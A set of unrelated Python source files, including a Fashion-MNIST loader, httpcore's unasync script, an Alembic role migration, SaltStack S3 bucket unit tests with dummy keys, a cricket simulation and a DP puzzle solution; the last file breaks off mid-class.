tmpArr.append( img_resized )
tmpArr = np.stack( tmpArr )
tmpArr = np.stack([ tmpArr ] * channelSize, axis=-1)
inputDataDict[dataName] = tmpArr
return inputDataDict
except Exception as e:
logger.error('Unable to generate train data \n{}'.format(str(e)))
@lD.log(logBase + '.mnistFashion')
def mnistFashion(logger):
try:
cacheFilePath = os.path.join(dataFolder, 'mnist_fashion.pkl')
if not os.path.exists( cacheFilePath ):
fashion_mnist = keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
shutil.rmtree('/Users/lingyit/.keras/datasets/fashion-mnist/')
dataDict = {
'train_images' : train_images,
'train_labels' : train_labels,
'test_images' : test_images,
'test_labels' : test_labels
}
pickle.dump(dataDict, open(cacheFilePath, 'wb'))
else:
dataDict = pickle.load(open(cacheFilePath, 'rb'))
return dataDict
except Exception as e:
logger.error('Unable to get mnist Fashion data \n{}'.format(str(e)))
@lD.log(logBase + '.showOneImg')
def showOneImg(logger, imageIndex):
try:
dataDict = mnistFashion()
train_images = dataDict['train_images']
train_labels = dataDict['train_labels']
test_images = dataDict['test_images']
test_labels = dataDict['test_labels']
visualiseArray( train_images[imageIndex] )
except Exception as e:
logger.error('Unable to show one image \n{}'.format(str(e)))
@lD.log(logBase + '.visualiseArray')
def visualiseArray(logger, img):
try:
plt.figure()
plt.imshow( img )
plt.colorbar()
plt.grid(False)
plt.show()
except Exception as e:
logger.error('Unable to visualise image array \n{}'.format(str(e)))
@lD.log(logBase + '.showMultipleImgs')
def showMultipleImgs(logger, N):
try:
dataDict = mnistFashion()
train_images = dataDict['train_images']
train_labels = dataDict['train_labels']
test_images = dataDict['test_images']
test_labels = dataDict['test_labels']
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
stackedImg = np.stack([ train_images[i] for i in range(N) ], axis=-1)
labels = [ class_names[train_labels[i]] for i in range(N) ]
visualiseStackedArray( stackedImg, labels )
except Exception as e:
logger.error('Unable to show one image \n{}'.format(str(e)))
@lD.log(logBase + '.visualiseStackedArray')
def visualiseStackedArray(logger, stackedImg, xlabels=None, cmap=plt.cm.binary):
try:
N = stackedImg.shape[-1]
sqrtN = np.ceil(np.sqrt(N))
if sqrtN > 10:
rowN, colN = np.ceil( N / 10 ), 10
else:
rowN, colN = sqrtN, sqrtN
plt.figure(figsize=(10, rowN))
for i in range(N):
plt.subplot(rowN, colN, i+1)
plt.xticks([])
plt.yticks([])
plt.grid(False)
plt.imshow( stackedImg[:, :, i], cmap=cmap )
if xlabels is not None:
plt.xlabel( xlabels[i] )
plt.tight_layout()
plt.show()
except Exception as e:
logger.error('Unable to visualise stacked array \n{}'.format(str(e)))
@lD.log(logBase + '.main')
def main(logger, resultsDict):
try:
print('getting numpy MNIST data dictionary')
dataDict = mnistFashion()
print('keys', dataDict.keys())
print('getting stacked & resized MNIST data array with channels')
inputDataDict = getInputDataDict( resize_shape=(56, 56, 3) )
print( inputDataDict['train_images'].shape, inputDataDict['train_images'].max(), inputDataDict['train_images'].min() )
print( inputDataDict['test_images'].shape, inputDataDict['test_images'].max(), inputDataDict['test_images'].min() )
except Exception as e:
logger.error('Unable to run main \n{}'.format(str(e)))
if __name__ == '__main__':
print('tf.__version__ :', tf.__version__)
### -------------------------------------------------
### Give it a try run on getting mnist fashion data
### -------------------------------------------------
print('try fetching data..')
dataDict = mnistFashion()
for dataName in dataDict:
data = dataDict[dataName]
print(dataName, type(data), data.shape)
|
#!venv/bin/python
import re
import os
import sys
SUBS = [
('AsyncIteratorByteStream', 'IteratorByteStream'),
('AsyncIterator', 'Iterator'),
('AutoBackend', 'SyncBackend'),
('Async([A-Z][A-Za-z0-9_]*)', r'Sync\2'),
('async def', 'def'),
('async with', 'with'),
('async for', 'for'),
('await ', ''),
('arequest', 'request'),
('aclose', 'close'),
('aclose_func', 'close_func'),
('aiterator', 'iterator'),
('__aenter__', '__enter__'),
('__aexit__', '__exit__'),
('__aiter__', '__iter__'),
('@pytest.mark.anyio', ''),
('@pytest.mark.trio', ''),
(r'@pytest.fixture\(params=\["auto", "anyio"\]\)',
'@pytest.fixture(params=["sync"])'),
('lookup_async_backend', "lookup_sync_backend"),
('auto', 'sync'),
]
COMPILED_SUBS = [
(re.compile(r'(^|\b)' + regex + r'($|\b)'), repl)
for regex, repl in SUBS
]
def unasync_line(line):
for regex, repl in COMPILED_SUBS:
line = re.sub(regex, repl, line)
return line
def unasync_file(in_path, out_path):
with open(in_path, "r") as in_file:
with open(out_path, "w", newline="") as out_file:
for line in in_file.readlines():
line = unasync_line(line)
out_file.write(line)
def unasync_file_check(in_path, out_path):
with open(in_path, "r") as in_file:
with open(out_path, "r") as out_file:
for in_line, out_line in zip(in_file.readlines(), out_file.readlines()):
expected = unasync_line(in_line)
if out_line != expected:
print(f'unasync mismatch between {in_path!r} and {out_path!r}')
print(f'Async code: {in_line!r}')
print(f'Expected sync code: {expected!r}')
print(f'Actual sync code: {out_line!r}')
sys.exit(1)
def unasync_dir(in_dir, out_dir, check_only=False):
for dirpath, dirnames, filenames in os.walk(in_dir):
for filename in filenames:
if not filename.endswith('.py'):
continue
rel_dir = os.path.relpath(dirpath, in_dir)
in_path = os.path.normpath(os.path.join(in_dir, rel_dir, filename))
out_path = os.path.normpath(os.path.join(out_dir, rel_dir, filename))
print(in_path, '->', out_path)
if check_only:
unasync_file_check(in_path, out_path)
else:
unasync_file(in_path, out_path)
def main():
check_only = '--check' in sys.argv
unasync_dir("httpcore/_async", "httpcore/_sync", check_only=check_only)
unasync_dir("tests/async_tests", "tests/sync_tests", check_only=check_only)
if __name__ == '__main__':
main()
|
# Copyright (C) 2020 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""
Add 2 new roles for scoping objects
Create Date: 2018-10-23 11:02:28.166523
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
import datetime
from alembic import op
from ggrc.migrations.utils import migrator
from ggrc.migrations.utils import (
acr_propagation_constants_scoping_objects_new_roles as acr_constants
)
from ggrc.migrations.utils import acr_propagation
# revision identifiers, used by Alembic.
revision = '348465c9e5ed'
down_revision = 'cb58d1d52368'
SCOPING_OBJECTS = [
"AccessGroup",
"DataAsset",
"Facility",
"Market",
"Metric",
"OrgGroup",
"Process",
"Product",
"ProductGroup",
"Project",
"System",
"TechnologyEnvironment",
"Vendor",
]
NEW_ROLES = [
"Line of Defense One Contacts",
"Vice Presidents",
]
def _add_roles_for_objects(objects, new_roles):
""" Creates new roles in acr for a given list of objects.
Args:
objects: object names for which new roles should be added
new_roles: list of roles to add into the acr
"""
connection = op.get_bind()
user_id = migrator.get_migration_user_id(connection)
update_entries = []
for object_name in objects:
for role_name in new_roles:
update_entries.append({
'name': role_name,
'object_type': object_name,
'mandatory': False,
'non_editable': True,
'created_at': datetime.datetime.now(),
'updated_at': datetime.datetime.now(),
'default_to_current_user': False,
'modified_by_id': user_id,
})
op.bulk_insert(
acr_propagation.ACR_TABLE,
update_entries
)
def upgrade():
"""Upgrade database schema and/or data, creating a new revision."""
_add_roles_for_objects(SCOPING_OBJECTS, NEW_ROLES)
acr_propagation.propagate_roles(
acr_constants.GGRC_NEW_ROLES_PROPAGATION,
with_update=True
)
def downgrade():
"""Downgrade database schema and/or data back to the previous revision."""
raise Exception("Downgrade is not supported.")
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import random
import string
import logging
from copy import deepcopy
# Import Salt Testing libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import skipIf, TestCase
from tests.support.mock import (
MagicMock,
NO_MOCK,
NO_MOCK_REASON,
patch
)
# Import Salt libs
import salt.loader
import salt.modules.boto_s3_bucket as boto_s3_bucket
from salt.utils.versions import LooseVersion
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import range # pylint: disable=import-error,redefined-builtin
# pylint: disable=import-error,no-name-in-module,unused-import
try:
import boto
import boto3
from botocore.exceptions import ClientError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
# pylint: enable=import-error,no-name-in-module,unused-import
# the boto_s3_bucket module relies on the connect_to_region() method
# which was added in boto 2.8.0
# https://github.com/boto/boto/commit/33ac26b416fbb48a60602542b4ce15dcc7029f12
required_boto3_version = '1.2.1'
log = logging.getLogger(__name__)
def _has_required_boto():
'''
Returns True/False boolean depending on if Boto is installed and correct
version.
'''
if not HAS_BOTO:
return False
elif LooseVersion(boto3.__version__) < LooseVersion(required_boto3_version):
return False
else:
return True
if _has_required_boto():
region = 'us-east-1'
access_key = 'GKTADJGHEIQSXMKKRBJ08H'
secret_key = 'askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs'
conn_parameters = {'region': region, 'key': access_key, 'keyid': secret_key, 'profile': {}}
error_message = 'An error occurred (101) when calling the {0} operation: Test-defined error'
e404_error = ClientError({
'Error': {
'Code': '404',
'Message': "Test-defined error"
}
}, 'msg')
not_found_error = ClientError({
'Error': {
'Code': 'NoSuchBucket',
'Message': "Test-defined error"
}
}, 'msg')
error_content = {
'Error': {
'Code': 101,
'Message': "Test-defined error"
}
}
create_ret = {
'Location': 'nowhere',
}
list_ret = {
'Buckets': [{
'Name': 'mybucket',
'CreationDate': None
}],
'Owner': {
'DisplayName': 'testuser',
'ID': '12341234123'
},
'ResponseMetadata': {'Key': 'Value'}
}
config_ret = {
'get_bucket_acl': {
'Grants': [{
'Grantee': {
'DisplayName': 'testowner',
'ID': 'sdfghjklqwertyuiopzxcvbnm'
},
'Permission': 'FULL_CONTROL'
}, {
'Grantee': {
'URI': 'http://acs.amazonaws.com/groups/global/AllUsers'
},
'Permission': 'READ'
}],
'Owner': {
'DisplayName': 'testowner',
'ID': 'sdfghjklqwertyuiopzxcvbnm'
}
},
'get_bucket_cors': {
'CORSRules': [{
'AllowedMethods': ["GET"],
'AllowedOrigins': ["*"],
}]
},
'get_bucket_lifecycle_configuration': {
'Rules': [{
'Expiration': {
'Days': 1
},
'Prefix': 'prefix',
'Status': 'Enabled',
'ID': 'asdfghjklpoiuytrewq'
}]
},
'get_bucket_location': {
'LocationConstraint': 'EU'
},
'get_bucket_logging': {
'LoggingEnabled': {
'TargetBucket': 'my-bucket',
'TargetPrefix': 'prefix'
}
},
'get_bucket_notification_configuration': {
'LambdaFunctionConfigurations': [{
'LambdaFunctionArn': 'arn:aws:lambda:us-east-1:111111222222:function:my-function',
'Id': 'zxcvbnmlkjhgfdsa',
'Events': ["s3:ObjectCreated:*"],
'Filter': {
'Key': {
'FilterRules': [{
'Name': 'prefix',
'Value': 'string'
}]
}
}
}]
},
'get_bucket_policy': {
'Policy':
'{"Version":"2012-10-17","Statement":[{"Sid":"","Effect":"Allow","Principal":{"AWS":"arn:aws:iam::111111222222:root"},"Action":"s3:PutObject","Resource":"arn:aws:s3:::my-bucket/*"}]}'
},
'get_bucket_replication': {
'ReplicationConfiguration': {
'Role': 'arn:aws:iam::11111222222:my-role',
'Rules': [{
'ID': "r1",
'Prefix': "prefix",
'Status': "Enabled",
'Destination': {
'Bucket': "arn:aws:s3:::my-bucket"
}
}]
}
},
'get_bucket_request_payment': {'Payer': 'Requester'},
'get_bucket_tagging': {
'TagSet': [{
'Key': 'c',
'Value': 'd'
}, {
'Key': 'a',
'Value': 'b',
}]
},
'get_bucket_versioning': {
'Status': 'Enabled'
},
'get_bucket_website': {
'ErrorDocument': {
'Key': 'error.html'
},
'IndexDocument': {
'Suffix': 'index.html'
}
}
}
@skipIf(HAS_BOTO is False, 'The boto module must be installed.')
@skipIf(_has_required_boto() is False, 'The boto3 module must be greater than'
' or equal to version {0}'
.format(required_boto3_version))
@skipIf(NO_MOCK, NO_MOCK_REASON)
class BotoS3BucketTestCaseBase(TestCase, LoaderModuleMockMixin):
conn = None
def setup_loader_modules(self):
self.opts = opts = salt.config.DEFAULT_MINION_OPTS
utils = salt.loader.utils(
opts,
whitelist=['boto3', 'args', 'systemd', 'path', 'platform'],
context={})
return {boto_s3_bucket: {'__utils__': utils}}
def setUp(self):
super(BotoS3BucketTestCaseBase, self).setUp()
boto_s3_bucket.__init__(self.opts)
del self.opts
# Set up MagicMock to replace the boto3 session
# connections keep getting cached from prior tests, can't find the
# correct context object to clear it. So randomize the cache key, to prevent any
# cache hits
conn_parameters['key'] = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(50))
self.patcher = patch('boto3.session.Session')
self.addCleanup(self.patcher.stop)
self.addCleanup(delattr, self, 'patcher')
mock_session = self.patcher.start()
session_instance = mock_session.return_value
self.conn = MagicMock()
self.addCleanup(delattr, self, 'conn')
session_instance.client.return_value = self.conn
class BotoS3BucketTestCaseMixin(object):
pass
class BotoS3BucketTestCase(BotoS3BucketTestCaseBase, BotoS3BucketTestCaseMixin):
'''
TestCase for salt.modules.boto_s3_bucket module
'''
def test_that_when_checking_if_a_bucket_exists_and_a_bucket_exists_the_bucket_exists_method_returns_true(self):
'''
Tests checking s3 bucket existence when the s3 bucket already exists
'''
self.conn.head_bucket.return_value = None
result = boto_s3_bucket.exists(Bucket='mybucket', **conn_parameters)
self.assertTrue(result['exists'])
def test_that_when_checking_if_a_bucket_exists_and_a_bucket_does_not_exist_the_bucket_exists_method_returns_false(self):
'''
Tests checking s3 bucket existence when the s3 bucket does not exist
'''
self.conn.head_bucket.side_effect = e404_error
result = boto_s3_bucket.exists(Bucket='mybucket', **conn_parameters)
self.assertFalse(result['exists'])
def test_that_when_checking_if_a_bucket_exists_and_boto3_returns_an_error_the_bucket_exists_method_returns_error(self):
'''
Tests checking s3 bucket existence when boto returns an error
'''
self.conn.head_bucket.side_effect = ClientError(error_content, 'head_bucket')
result = boto_s3_bucket.exists(Bucket='mybucket', **conn_parameters)
self.assertEqual(result.get('error', {}).get('message'), error_message.format('head_bucket'))
def test_that_when_creating_a_bucket_succeeds_the_create_bucket_method_returns_true(self):
'''
tests True bucket created.
'''
self.conn.create_bucket.return_value = create_ret
result = boto_s3_bucket.create(Bucket='mybucket',
LocationConstraint='nowhere',
**conn_parameters)
self.assertTrue(result['created'])
def test_that_when_creating_a_bucket_fails_the_create_bucket_method_returns_error(self):
'''
tests False bucket not created.
'''
self.conn.create_bucket.side_effect = ClientError(error_content, 'create_bucket')
result = boto_s3_bucket.create(Bucket='mybucket',
LocationConstraint='nowhere',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'), error_message.format('create_bucket'))
def test_that_when_deleting_a_bucket_succeeds_the_delete_bucket_method_returns_true(self):
'''
tests True bucket deleted.
'''
result = boto_s3_bucket.delete(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_a_bucket_fails_the_delete_bucket_method_returns_false(self):
'''
tests False bucket not deleted.
'''
self.conn.delete_bucket.side_effect = ClientError(error_content, 'delete_bucket')
result = boto_s3_bucket.delete(Bucket='mybucket',
**conn_parameters)
self.assertFalse(result['deleted'])
def test_that_when_describing_bucket_it_returns_the_dict_of_properties_returns_true(self):
'''
Tests describing parameters if bucket exists
'''
for key, value in six.iteritems(config_ret):
getattr(self.conn, key).return_value = deepcopy(value)
result = boto_s3_bucket.describe(Bucket='mybucket', **conn_parameters)
self.assertTrue(result['bucket'])
def test_that_when_describing_bucket_it_returns_the_dict_of_properties_returns_false(self):
'''
Tests describing parameters if bucket does not exist
'''
self.conn.get_bucket_acl.side_effect = not_found_error
result = boto_s3_bucket.describe(Bucket='mybucket', **conn_parameters)
self.assertFalse(result['bucket'])
def test_that_when_describing_bucket_on_client_error_it_returns_error(self):
'''
Tests describing parameters failure
'''
self.conn.get_bucket_acl.side_effect = ClientError(error_content, 'get_bucket_acl')
result = boto_s3_bucket.describe(Bucket='mybucket', **conn_parameters)
self.assertTrue('error' in result)
def test_that_when_listing_buckets_succeeds_the_list_buckets_method_returns_true(self):
'''
tests True buckets listed.
'''
self.conn.list_buckets.return_value = deepcopy(list_ret)
result = boto_s3_bucket.list(**conn_parameters)
self.assertTrue(result['Buckets'])
def test_that_when_listing_bucket_fails_the_list_bucket_method_returns_false(self):
'''
tests False no bucket listed.
'''
ret = deepcopy(list_ret)
log.info(ret)
ret['Buckets'] = list()
self.conn.list_buckets.return_value = ret
result = boto_s3_bucket.list(**conn_parameters)
self.assertFalse(result['Buckets'])
def test_that_when_listing_bucket_fails_the_list_bucket_method_returns_error(self):
'''
tests False bucket error.
'''
self.conn.list_buckets.side_effect = ClientError(error_content, 'list_buckets')
result = boto_s3_bucket.list(**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'), error_message.format('list_buckets'))
def test_that_when_putting_acl_succeeds_the_put_acl_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_acl(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_acl_fails_the_put_acl_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_acl.side_effect = ClientError(error_content,
'put_bucket_acl')
result = boto_s3_bucket.put_acl(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_acl'))
def test_that_when_putting_cors_succeeds_the_put_cors_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_cors(Bucket='mybucket', CORSRules='[]',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_cors_fails_the_put_cors_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_cors.side_effect = ClientError(error_content,
'put_bucket_cors')
result = boto_s3_bucket.put_cors(Bucket='mybucket', CORSRules='[]',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_cors'))
def test_that_when_putting_lifecycle_configuration_succeeds_the_put_lifecycle_configuration_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_lifecycle_configuration(Bucket='mybucket',
Rules='[]',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_lifecycle_configuration_fails_the_put_lifecycle_configuration_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_lifecycle_configuration.side_effect = ClientError(error_content,
'put_bucket_lifecycle_configuration')
result = boto_s3_bucket.put_lifecycle_configuration(Bucket='mybucket',
Rules='[]',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_lifecycle_configuration'))
def test_that_when_putting_logging_succeeds_the_put_logging_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_logging(Bucket='mybucket',
TargetBucket='arn:::::',
TargetPrefix='asdf',
TargetGrants='[]',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_logging_fails_the_put_logging_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_logging.side_effect = ClientError(error_content,
'put_bucket_logging')
result = boto_s3_bucket.put_logging(Bucket='mybucket',
TargetBucket='arn:::::',
TargetPrefix='asdf',
TargetGrants='[]',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_logging'))
def test_that_when_putting_notification_configuration_succeeds_the_put_notification_configuration_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_notification_configuration(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_notification_configuration_fails_the_put_notification_configuration_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_notification_configuration.side_effect = ClientError(error_content,
'put_bucket_notification_configuration')
result = boto_s3_bucket.put_notification_configuration(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_notification_configuration'))
def test_that_when_putting_policy_succeeds_the_put_policy_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_policy(Bucket='mybucket',
Policy='{}',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_policy_fails_the_put_policy_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_policy.side_effect = ClientError(error_content,
'put_bucket_policy')
result = boto_s3_bucket.put_policy(Bucket='mybucket',
Policy='{}',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_policy'))
def test_that_when_putting_replication_succeeds_the_put_replication_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_replication(Bucket='mybucket',
Role='arn:aws:iam:::',
Rules='[]',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_replication_fails_the_put_replication_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_replication.side_effect = ClientError(error_content,
'put_bucket_replication')
result = boto_s3_bucket.put_replication(Bucket='mybucket',
Role='arn:aws:iam:::',
Rules='[]',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_replication'))
def test_that_when_putting_request_payment_succeeds_the_put_request_payment_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_request_payment(Bucket='mybucket',
Payer='Requester',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_request_payment_fails_the_put_request_payment_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_request_payment.side_effect = ClientError(error_content,
'put_bucket_request_payment')
result = boto_s3_bucket.put_request_payment(Bucket='mybucket',
Payer='Requester',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_request_payment'))
def test_that_when_putting_tagging_succeeds_the_put_tagging_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_tagging(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_tagging_fails_the_put_tagging_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_tagging.side_effect = ClientError(error_content,
'put_bucket_tagging')
result = boto_s3_bucket.put_tagging(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_tagging'))
def test_that_when_putting_versioning_succeeds_the_put_versioning_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_versioning(Bucket='mybucket',
Status='Enabled',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_versioning_fails_the_put_versioning_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_versioning.side_effect = ClientError(error_content,
'put_bucket_versioning')
result = boto_s3_bucket.put_versioning(Bucket='mybucket',
Status='Enabled',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_versioning'))
def test_that_when_putting_website_succeeds_the_put_website_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_website(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_website_fails_the_put_website_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_website.side_effect = ClientError(error_content,
'put_bucket_website')
result = boto_s3_bucket.put_website(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_website'))
def test_that_when_deleting_cors_succeeds_the_delete_cors_method_returns_true(self):
'''
tests True bucket attribute deleted.
'''
result = boto_s3_bucket.delete_cors(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_cors_fails_the_delete_cors_method_returns_error(self):
'''
tests False bucket attribute not deleted.
'''
self.conn.delete_bucket_cors.side_effect = ClientError(error_content,
'delete_bucket_cors')
result = boto_s3_bucket.delete_cors(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('delete_bucket_cors'))
def test_that_when_deleting_lifecycle_configuration_succeeds_the_delete_lifecycle_configuration_method_returns_true(self):
'''
tests True bucket attribute deleted.
'''
result = boto_s3_bucket.delete_lifecycle_configuration(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_lifecycle_configuration_fails_the_delete_lifecycle_configuration_method_returns_error(self):
'''
tests False bucket attribute not deleted.
'''
self.conn.delete_bucket_lifecycle.side_effect = ClientError(error_content,
'delete_bucket_lifecycle_configuration')
result = boto_s3_bucket.delete_lifecycle_configuration(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('delete_bucket_lifecycle_configuration'))
def test_that_when_deleting_policy_succeeds_the_delete_policy_method_returns_true(self):
'''
tests True bucket attribute deleted.
'''
result = boto_s3_bucket.delete_policy(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_policy_fails_the_delete_policy_method_returns_error(self):
'''
tests False bucket attribute not deleted.
'''
self.conn.delete_bucket_policy.side_effect = ClientError(error_content,
'delete_bucket_policy')
result = boto_s3_bucket.delete_policy(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('delete_bucket_policy'))
def test_that_when_deleting_replication_succeeds_the_delete_replication_method_returns_true(self):
'''
tests True bucket attribute deleted.
'''
result = boto_s3_bucket.delete_replication(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_replication_fails_the_delete_replication_method_returns_error(self):
'''
tests False bucket attribute not deleted.
'''
self.conn.delete_bucket_replication.side_effect = ClientError(error_content,
'delete_bucket_replication')
result = boto_s3_bucket.delete_replication(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('delete_bucket_replication'))
def test_that_when_deleting_tagging_succeeds_the_delete_tagging_method_returns_true(self):
'''
tests True bucket attribute deleted.
'''
result = boto_s3_bucket.delete_tagging(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_tagging_fails_the_delete_tagging_method_returns_error(self):
'''
tests False bucket attribute not deleted.
'''
self.conn.delete_bucket_tagging.side_effect = ClientError(error_content,
'delete_bucket_tagging')
result = boto_s3_bucket.delete_tagging(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('delete_bucket_tagging'))
def test_that_when_deleting_website_succeeds_the_delete_website_method_returns_true(self):
'''
tests True bucket attribute deleted.
'''
result = boto_s3_bucket.delete_website(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_website_fails_the_delete_website_method_returns_error(self):
'''
tests False bucket attribute not deleted.
'''
self.conn.delete_bucket_website.side_effect = ClientError(error_content,
'delete_bucket_website')
result = boto_s3_bucket.delete_website(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('delete_bucket_website'))
|
#!/usr/bin/env python3
import os
from app.models import Player
from app.resources import GamePlay
import argparse
def get_team():
"""
Initializes the squad: the list of players in the order they are
expected to bat.
Uses the Player model to create each batsman with their given
scoring probabilities.
"""
batsmen_list = [
Player('Kirat Boli', {
'0': 5,
'1': 30,
'2': 25,
'3': 10,
'4': 15,
'5': 1,
'6': 9,
'OUT': 5,
}),
Player('N.S. Nodhi', {
'0': 10,
'1': 40,
'2': 20,
'3': 5,
'4': 10,
'5': 1,
'6': 4,
'OUT': 10,
}),
Player('R Rumrah', {
'0': 20,
'1': 30,
'2': 15,
'3': 5,
'4': 5,
'5': 1,
'6': 4,
'OUT': 20,
}),
Player('Shashi Henra', {
'0': 30,
'1': 25,
'2': 5,
'3': 0,
'4': 5,
'5': 1,
'6': 4,
'OUT': 30,
})
]
return batsmen_list
def main():
"""
Lets the game begin!
"""
parser = argparse.ArgumentParser()
parser.add_argument('-rg', '--random-generator',
dest='random_gen_class',
help='Provide one of the stochastic schemes for '
'generating random scores, takes one of the 2 '
'values - \'random sampling\' or '
'\'roulette selection\'',
type=str)
# parse the given arguments if any
args = parser.parse_args()
batting_lineup = get_team()
# new Game instance
game = GamePlay(batting_lineup, random_gen_class=args.random_gen_class)
game.execute_run_chase()
if __name__ == '__main__':
main()
|
import sys
from typing import List
input = sys.stdin.readline
# def solution(N: int, nums: List[int]):
# __cache__ = [[0, 0] for _ in range(N)]
# __cache__[0] = [nums[0], nums[0]]
# for i in range(1, N):
# __prev__ = 0
# for j in range(i - 1, -1, -1):
# if nums[j] < nums[i]:
# __prev__ = max(__prev__, __cache__[j][0])
# __cache__[i][0] = __prev__ + nums[i]
# __cache__[i][1] = max(__cache__[i - 1][1], __cache__[i][0])
# return __cache__[N - 1][1]
def solution(N: int, nums: List[int]):
__cache__ = [0] * 1001
for num in nums:
__cache__[num] = max(__cache__[:num]) + num
return max(__cache__)
N = int(input())
nums = list(map(int, input().split()))
__cache__ = [0] * 1001
for num in nums:
__cache__[num] = max(__cache__[:num]) + num
print(max(__cache__))
|
from redis_admin.compat import url as redis_admin_url, get_library
Library = get_library()
register = Library()
@register.tag
def url(parser, token):
return redis_admin_url(parser, token)
|
'''Glyph'''
from importlib import reload
import zDogPy.shape
reload(zDogPy.shape)
from zDogPy.shape import Shape
def makePath(glyph, closed=True):
path = []
for ci, c in enumerate(glyph.contours):
if closed:
pt0 = c[-1][-1]
cmd = { 'move' : {'x': pt0.x, 'y': pt0.y } }
path.append(cmd)
for si, s in enumerate(c.segments):
if len(s) == 1:
pt = s[0]
if si == 0 and not closed:
cmd = { 'move' : { 'x': pt.x, 'y': pt.y } }
else:
cmd = { 'x': pt.x, 'y': pt.y }
elif len(s) == 3:
cmd = { 'bezier' : [{ 'x': pt.x, 'y': pt.y } for pt in s] }
path.append(cmd)
return path
class Glyph(Shape):
def __init__(self, glyph, centered=True, **kwargs):
self.glyph = glyph
if centered:
L, B, R, T = self.glyph.bounds
